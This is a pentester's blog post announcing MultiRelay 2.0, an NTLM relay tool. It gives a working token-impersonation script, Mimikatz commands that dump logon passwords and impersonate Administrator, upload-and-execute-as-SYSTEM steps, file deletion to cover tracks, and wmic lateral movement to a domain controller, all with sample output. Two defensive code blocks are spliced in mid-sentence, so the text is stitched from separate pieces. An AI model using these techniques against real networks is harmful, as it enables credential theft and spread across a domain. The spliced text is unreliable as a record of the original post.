Friday, March 31, 2017

MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.


Introduction:

If you haven't read the initial MultiRelay introduction post, I strongly invite you to read it.

MultiRelay Description:

MultiRelay 2.0 is a powerful, professional-grade pentest utility included in Responder's tools folder. It gives you the ability to perform targeted NTLMv1 and NTLMv2 relay and post-exploitation against a selected target.

New Functionalities:

Several new functionalities were added to the MultiRelay shell interface; they are listed below:
  • Upload a file to the target:
    Using the "upload" command, a user can push any file to the compromised target over SMB. The file will be uploaded to c:\Windows\Temp\
  • Delete a file on the target:
    Using the "delete" command, a user can delete any file on the compromised target over SMB. If the file has been successfully deleted, no errors will be shown.
  • Run a command as the currently logged in user:
    Using the "runas" command, a user will be able to launch a service which runs a command as the currently logged in user.
  • Pivot to another host using the currently logged in user's credentials:
    Using the "pivot" command, a user will attempt to propagate to another host (lateral movement).
  • Run remote Mimikatz (32-bit, 64-bit) RPC commands:
    Using the "mimi" or "mimi32" command, the user will be able to interact with mimikatz RPC on the target.
  • Scan the current /24 or /16 in order to find other hosts to pivot to:
    When using the "scan /24" command, a user will be able to scan the entire class C and choose another host to pivot to.
  • Run a command on the target as LocalSystem:
    Any other command will launch a service which runs that command as LocalSystem.

Since the previous version, two new options were added:
  • -c Run a command as system then exit (scripting).
  • -d Dump the SAM database then exit (scripting).

Good Things To Know:

  • All binaries used by MultiRelay are stored in ./tools/MultiRelay/bin/
  • Filenames for these binaries are specified in MultiRelay.py, starting at line 48:
    MimikatzFilename    = "./MultiRelay/bin/mimikatz.exe"
    Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
    RunAsFileName       = "./MultiRelay/bin/Runas.exe"
    SysSVCFileName      = "./MultiRelay/bin/Syssvc.exe"
  • Any of these binaries can be replaced with your own; just make sure to change the name accordingly in MultiRelay.py.
  • The upload local path is ./tools/. If you put your payloads in ./tools/MultiRelay/, you'll have to run: upload MultiRelay/custompayload.exe. Best is to provide the full path.
  • If you have a set of credentials, you can use MultiRelay without relaying an NTLM hash. On one screen point MultiRelay to your target, and on another one run: smbclient -U user%password -W domain //Your_IP/c$
  • Think about the command you're about to launch before launching it. Uploading your custom version of mimikatz and running "mimikatz" will keep the process hanging, and you won't be able to delete the file unless you use taskkill /F /IM file.exe. For custom mimikatz command usage with MultiRelay, please refer to the MultiRelay 2.0 Wushu section.

NTLM Relay Lateral Movement:

MultiRelay's philosophy is that any successful NTLM Relay is precious and everything should be done to keep that SMB connection alive.

Getting command execution via NTLM Relay is commonly achieved via SVCCTL:
  • Open IPC$ named pipe \SVCCTL -> create a service with your command -> start the service -> get the output -> done.
While running commands as SYSTEM is cool, you can't do much on the network with this user, meaning that you cannot access other network resources with a local system account.
This limits the compromise to one host at a time, and you might wait a long time before another administrator hash flies over the wire...
While building MultiRelay 1.0, I thought it would be nice to execute commands as the currently logged in user in the next version and have the ability to pivot across the network. When I started to work on MultiRelay 2.0 I made a five-line Python script (Runas.py) which impersonates a logged in user:
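The defender's side of the SVCCTL execution flow above, added here as an example (this is not code from the post or from MultiRelay): a small triage over constructed Windows System-log 7045 ("A service was installed in the system") events that flags services whose image path is a cmd /c one-liner or a binary under Windows\Temp, the directory the upload command writes to. The key=value rendering, field names, host names and service names are assumptions made up for this example.

```python
import re

# Constructed sample 7045 ("A service was installed in the system") events,
# rendered as key=value text the way a log forwarder might emit them.
# Hosts, service names and paths are made up for this example.
SAMPLE_EVENTS = [
    'EventID=7045 Host=WS01 ServiceName="Print Helper" ImagePath="C:\\Windows\\System32\\svchost.exe -k netsvcs" AccountName="LocalSystem"',
    'EventID=7045 Host=WS01 ServiceName="upd3" ImagePath="cmd.exe /c whoami" AccountName="LocalSystem"',
    'EventID=7045 Host=WS02 ServiceName="tmpsvc" ImagePath="%windir%\\Temp\\payload.exe" AccountName="LocalSystem"',
    'EventID=7036 Host=WS02 ServiceName="tmpsvc" State="running"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# A service whose "binary" is really a cmd.exe /c (or /k) one-liner.
CMD_ONELINER_RE = re.compile(r'(?:cmd(?:\.exe)?|%COMSPEC%)\s+/[ck]\b', re.IGNORECASE)
# A service binary under Windows\Temp, where the upload command drops files.
TEMP_DIR_RE = re.compile(r'(?:\\Windows|%windir%)\\Temp\\', re.IGNORECASE)


def parse_event(line):
    """Turn one key=value line into a dict (values may be quoted or bare)."""
    fields = {}
    for key, quoted, bare in FIELD_RE.findall(line):
        fields[key] = quoted if quoted else bare
    return fields


def classify_7045(fields):
    """Reasons a 7045 event looks like remote service-based command execution."""
    if fields.get("EventID") != "7045":
        return []
    image = fields.get("ImagePath", "")
    reasons = []
    if CMD_ONELINER_RE.search(image):
        reasons.append("image path is a cmd /c one-liner")
    if TEMP_DIR_RE.search(image):
        reasons.append("image path is under Windows Temp")
    return reasons


def triage(lines):
    """Return (host, service name, reasons) for every suspicious 7045 event."""
    hits = []
    for line in lines:
        fields = parse_event(line)
        reasons = classify_7045(fields)
        if reasons:
            hits.append((fields.get("Host"), fields.get("ServiceName"), reasons))
    return hits
```

A benign service install (first sample) and a non-7045 event (last sample) produce no hit; the two remaining samples are reported with the matching reason.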

import sys, win32ts, win32process, win32con

# Session currently attached to the physical console, i.e. the interactively logged in user.
SessionID = win32ts.WTSGetActiveConsoleSessionId()
# Primary token of that session's user. This call requires the SE_TCB_NAME privilege, so the script must run as LocalSystem.
UserToken = win32ts.WTSQueryUserToken(SessionID)
# Launch cmd.exe /c <args> under that token; returns (hProcess, hThread, processId, threadId).
h,tn,pi,ti = win32process.CreateProcessAsUser(UserToken, "c:\\Windows\\system32\\cmd.exe", "/c "+' '.join(sys.argv[1:]), None, None, True, win32con.NORMAL_PRIORITY_CLASS, None, None, win32process.STARTUPINFO())

As stated in the WTSGetActiveConsoleSessionId MSDN documentation, the function "Retrieves the session identifier of the console session. The console session is the session that is currently attached to the physical console. Note that it is not necessary that Remote Desktop Services be running for this function to succeed".
Once we have the session ID, we use the WTSQueryUserToken function to retrieve the token associated with the previously acquired session ID, and call CreateProcessAsUser with our command.
In short, we're able to impersonate any logged in user and re-use their credentials and resource access across the network. This opens a whole new kind of NTLM Relay attack vector: propagation and mass compromise resulting from a single relayed authentication.

Teaming up with @gentilkiwi:

Earlier versions of MultiRelay used this Python script compiled with PyInstaller, which generated a pretty big file from a five-line Python script... @gentilkiwi jumped in and said "I think I can do way better", and he did.
@gentilkiwi developed a custom mimikatz RPC server, added more token impersonation options and the ability to run mimikatz as a service, and he also took care of bringing Runas.exe down to a decent size of 9k, while I was working on the Mimikatz RPC client and all the other MultiRelay functionalities.

These new Mimikatz functionalities allow MultiRelay to interact stealthily with Mimikatz and use, without restriction, all of the power this awesome tool gives us.


MultiRelay 2.0 Wushu:

Some post-exploitation attack examples are listed below:
  • Mimikatz RPC:
    Get all available tokens, impersonate one user and run a command as this user:
    • C:\Windows\system32\:#mimi token::list 
    • C:\Windows\system32\:#mimi token::run /user:User_To_Impersonate /process:Command_To_Run
    • C:\Windows\system32\:#mimi token::run /user:Administrator /process:whoami
    Get all logon passwords:
    • mimi sekurlsa::logonpasswords
    All regular mimikatz commands are available on the RPC interface.
  • Upload your custom mimikatz or payload and run it:
    Upload an executable and launch it from Windows/Temp/ as system.
    • C:\Windows\system32\:#upload path/to/mimikatz.exe
    • C:\Windows\system32\:#%windir%\Temp\mimikatz.exe "sekurlsa::logonpasswords" exit 
    The exit command is very important with mimikatz: if you don't use it, mimikatz will stay loaded and the command will fail.
    Note: If you need to run your executable as the currently logged in user, use:
    • C:\Windows\system32\:#runas %windir%\Temp\Filename.exe args
    Now delete the file:
    • C:\Windows\system32\:#delete /Windows/Temp/mimikatz.exe
  • Scan the current class C and pivot to another host:
    • C:\Windows\system32\:#scan /24
      ...[snip]...
      ['192.168.1.141', Os:'Windows Server 2016 Standard 14393', Domain:'SMB3', Signing:'True']
      ['192.168.1.142', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']
      ['192.168.1.144', Os:'Windows 5.1', Domain:'SMB3', Signing:'False']
      ['192.168.1.145', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']
      ...[snip]...
    •  C:\Windows\system32\:#pivot 192.168.1.145
      [+] Pivoting to 192.168.1.145.
      Connected to 192.168.1.145 as LocalSystem.
  • Run a command as the currently logged in user:
    • C:\Windows\system32\:#runas whoami
      smb3\lgandx 
  • Execute commands on the PDC remotely and read the output:
    • Mount the PDC C:\ drive:
    • C:\Windows\system32\:#runas net use g: \\smb3.local\c$
      The command completed successfully.
    • C:\Windows\system32\:#runas wmic /node:smb3.local process call create "cmd /c whoami^>c:\results.txt"
      Executing (Win32_Process)->Create()
      Method execution successful.
      Out Parameters:
      instance of __PARAMETERS
      {
      ProcessId = 1068;
      ReturnValue = 0;
      };
    • Note: When using special DOS characters with wmic, they need to be escaped with a ^. Example: whoami^>c:\results.txt
    • C:\Windows\system32\:#runas more g:\results.txt
      smb3\lgandx

    These are just a few examples of what MultiRelay allows you to accomplish in a Windows Active Directory environment; for the rest, it's up to your imagination.
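The "scan /24" output above shows, for each host, whether SMB signing is reported as True or False, and an NTLM relay to SMB only succeeds against a host that does not require signing. As an added example (not code from the post or from MultiRelay), the script below parses that output format into a remediation report of hosts where signing must be enforced; the three sample lines are copied from the post's own scan output, and the line format is assumed from those lines.

```python
import re
from collections import defaultdict

# Scan lines in the format MultiRelay's "scan /24" prints; these three entries
# are taken from the post's example output, not from a live scan.
SCAN_OUTPUT = """
['192.168.1.141', Os:'Windows Server 2016 Standard 14393', Domain:'SMB3', Signing:'True']
['192.168.1.142', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']
['192.168.1.144', Os:'Windows 5.1', Domain:'SMB3', Signing:'False']
"""

LINE_RE = re.compile(
    r"\['(?P<ip>[\d.]+)',\s*Os:'(?P<os>[^']*)',\s*Domain:'(?P<domain>[^']*)',"
    r"\s*Signing:'(?P<signing>True|False)'\]"
)


def parse_scan(text):
    """Parse scan lines into dicts; lines that do not match (e.g. ...[snip]...) are skipped."""
    hosts = []
    for m in LINE_RE.finditer(text):
        host = m.groupdict()
        host["signing"] = host["signing"] == "True"
        hosts.append(host)
    return hosts


def relay_exposed(hosts):
    """IPs whose SMB service reports no signing: a relayed NTLM authentication would be accepted there."""
    return [h["ip"] for h in hosts if not h["signing"]]


def remediation_report(text):
    """Summary of scanned hosts and, per domain, the hosts needing SMB signing enforced."""
    hosts = parse_scan(text)
    per_domain = defaultdict(list)
    for h in hosts:
        if not h["signing"]:
            per_domain[h["domain"]].append(h["ip"])
    return {"scanned": len(hosts), "exposed": relay_exposed(hosts), "by_domain": dict(per_domain)}
```

The "exposed" list is what goes into the ticket to enable "Microsoft network server: Digitally sign communications (always)" on those hosts.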

Final Words: The donation campaign

I work as an independent contractor/pentester and I get pretty busy these days. When I work on Responder, I end up working for free for the community and losing money I could make with my contracts, especially when a set of new functionalities or research takes up to a month, full time.
 
Therefore a donation campaign was launched a few months ago in order to get some funding for this project, and I think it was a success. More than 50 pentesters around the world and 3 companies donated to this project, thereby supporting the development of this set of free tools used in your everyday internal pentests.

I would like to thank all the independent penetration testers who donated and these 3 companies:
And all, ALL the pentesters around the world who donated to this project.
Your donations made this version happen.
Oh, I almost forgot, you can download Responder and MultiRelay 2.0 here:
https://github.com/lgandx/Responder

Happy hacking!